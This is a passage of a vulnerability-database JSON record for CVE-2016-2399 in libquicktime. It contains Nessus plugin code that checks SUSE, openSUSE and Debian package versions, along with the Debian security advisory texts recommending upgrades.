or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED12|SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED12 / SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(1|2)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP1/2\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED12\" && (! 
preg(pattern:\"^(1|2)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED12 SP1/2\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"libquicktime-debugsource-1.2.4-10.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"libquicktime0-1.2.4-10.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"libquicktime0-debuginfo-1.2.4-10.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"libquicktime-debugsource-1.2.4-10.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"libquicktime0-1.2.4-10.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"libquicktime0-debuginfo-1.2.4-10.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"libquicktime-debugsource-1.2.4-10.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"libquicktime0-1.2.4-10.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"libquicktime0-debuginfo-1.2.4-10.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"libquicktime-debugsource-1.2.4-10.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"libquicktime0-1.2.4-10.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"libquicktime0-debuginfo-1.2.4-10.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libquicktime\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-12T09:50:10", "description": "Marco Romano discovered that libquicktime, a library for reading and\nwriting QuickTime files, was vulnerable 
to an integer overflow attack.\nWhen opened, a specially crafted MP4 file would cause a denial of\nservice by crashing the application.", "edition": 24, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2017-03-03T00:00:00", "title": "Debian DSA-3800-1 : libquicktime - security update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-2399"], "modified": "2017-03-03T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:8.0", "p-cpe:/a:debian:debian_linux:libquicktime"], "id": "DEBIAN_DSA-3800.NASL", "href": "https://www.tenable.com/plugins/nessus/97498", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-3800. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(97498);\n script_version(\"3.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-2399\");\n script_xref(name:\"DSA\", value:\"3800\");\n\n script_name(english:\"Debian DSA-3800-1 : libquicktime - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Marco Romano discovered that libquicktime, a library for reading and\nwriting QuickTime files, was vulnerable to an integer overflow attack.\nWhen opened, a specially crafted MP4 file would cause a denial of\nservice by crashing the application.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=855099\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n 
value:\"https://packages.debian.org/source/jessie/libquicktime\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2017/dsa-3800\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the libquicktime packages.\n\nFor the stable distribution (jessie), this problem has been fixed in\nversion 2:1.2.4-7+deb8u1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libquicktime\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:8.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/03/03\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"8.0\", prefix:\"libquicktime-dev\", reference:\"2:1.2.4-7+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libquicktime-doc\", reference:\"2:1.2.4-7+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libquicktime2\", reference:\"2:1.2.4-7+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"quicktime-utils\", reference:\"2:1.2.4-7+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"quicktime-x11utils\", reference:\"2:1.2.4-7+deb8u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-20T12:32:15", "description": "This update for libquicktime fixes the following issues :\n\n - CVE-2016-2399: An integer overflow in the\n quicktime_read_pascal function in libquicktime allowed\n remote attackers to cause a denial of service or\n possibly have other unspecified impact via a crafted\n hdlr MP4 atom [boo#1022805]", "edition": 18, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2017-02-24T00:00:00", "title": "openSUSE Security Update : libquicktime (openSUSE-2017-288)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-2399"], "modified": "2017-02-24T00:00:00",
"cpe": ["p-cpe:/a:novell:opensuse:libquicktime-tools", "p-cpe:/a:novell:opensuse:libquicktime0-debuginfo-32bit", "cpe:/o:novell:opensuse:42.1", "p-cpe:/a:novell:opensuse:libquicktime0-32bit", "p-cpe:/a:novell:opensuse:libquicktime0", "p-cpe:/a:novell:opensuse:libquicktime0-debuginfo", "cpe:/o:novell:opensuse:42.2", "p-cpe:/a:novell:opensuse:libquicktime-debugsource", "p-cpe:/a:novell:opensuse:libquicktime-devel", "p-cpe:/a:novell:opensuse:libquicktime-tools-debuginfo"], "id": "OPENSUSE-2017-288.NASL", "href": "https://www.tenable.com/plugins/nessus/97368", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2017-288.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(97368);\n script_version(\"3.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2016-2399\");\n\n script_name(english:\"openSUSE Security Update : libquicktime (openSUSE-2017-288)\");\n script_summary(english:\"Check for the openSUSE-2017-288 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for libquicktime fixes the following issues :\n\n - CVE-2016-2399: A Integer overflow in the\n quicktime_read_pascal function in libquicktime allowed\n remote attackers to cause a denial of service or\n possibly have other unspecified impact via a crafted\n hdlr MP4 atom [boo#1022805]\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1022805\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected libquicktime packages.\"\n );\n 
script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libquicktime-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libquicktime-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libquicktime-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libquicktime-tools-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libquicktime0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libquicktime0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libquicktime0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libquicktime0-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/02/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/02/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE42\\.1|SUSE42\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"42.1 / 42.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libquicktime-debugsource-1.2.4cvs20150223-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libquicktime-devel-1.2.4cvs20150223-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libquicktime-tools-1.2.4cvs20150223-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libquicktime-tools-debuginfo-1.2.4cvs20150223-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libquicktime0-1.2.4cvs20150223-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libquicktime0-debuginfo-1.2.4cvs20150223-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libquicktime0-32bit-1.2.4cvs20150223-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libquicktime0-debuginfo-32bit-1.2.4cvs20150223-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"libquicktime-debugsource-1.2.4cvs20150223-6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", 
reference:\"libquicktime-devel-1.2.4cvs20150223-6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"libquicktime-tools-1.2.4cvs20150223-6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"libquicktime-tools-debuginfo-1.2.4cvs20150223-6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"libquicktime0-1.2.4cvs20150223-6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"libquicktime0-debuginfo-1.2.4cvs20150223-6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", cpu:\"x86_64\", reference:\"libquicktime0-32bit-1.2.4cvs20150223-6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", cpu:\"x86_64\", reference:\"libquicktime0-debuginfo-32bit-1.2.4cvs20150223-6.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libquicktime-debugsource / libquicktime-devel / libquicktime-tools / etc\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "debian": [{"lastseen": "2020-08-12T01:06:59", "bulletinFamily": "unix", "cvelist": ["CVE-2016-2399"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3800-1 security@debian.org\nhttps://www.debian.org/security/ Sebastien Delafond\nMarch 02, 2017 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : libquicktime\nCVE ID : CVE-2016-2399\nDebian Bug : 855099\n\nMarco Romano discovered that libquicktime, a library for reading and\nwriting QuickTime files, was vulnerable to an integer overflow\nattack. 
When opened, a specially crafted MP4 file would cause a denial\nof service by crashing the application.\n\nFor the stable distribution (jessie), this problem has been fixed in\nversion 2:1.2.4-7+deb8u1.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 2:1.2.4-10.\n\nWe recommend that you upgrade your libquicktime packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 8, "modified": "2017-03-02T09:19:42", "published": "2017-03-02T09:19:42", "id": "DEBIAN:DSA-3800-1:6B4DD", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2017/msg00054.html", "title": "[SECURITY] [DSA 3800-1] libquicktime security update", "type": "debian", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-30T02:22:05", "bulletinFamily": "unix", "cvelist": ["CVE-2016-2399"], "description": "Package : libquicktime\nVersion : 2:1.2.4-3+deb7u1\nCVE ID : CVE-2016-2399\nDebian Bug : 855099\n\nMarco 'nemux' Romano discovered that an integer overflow in the\nquicktime_read_pascal function in libquicktime 1.2.4 and earlier\nallows remote attackers to cause a denial of service or possibly have\nother unspecified impact via a crafted hdlr MP4 atom.\n\nFor Debian 7 \"Wheezy\", these problems have been fixed in version\n2:1.2.4-3+deb7u1.\n\nWe recommend that you upgrade your libquicktime packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS\n", "edition": 3, "modified": "2017-03-01T01:18:31", "published": "2017-03-01T01:18:31", "id": "DEBIAN:DLA-844-1:470FD", "href": "https://lists.debian.org/debian-lts-announce/2017/debian-lts-announce-201703/msg00000.html", "title": 
"[SECURITY] [DLA 844-1] libquicktime security update", "type": "debian", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}]}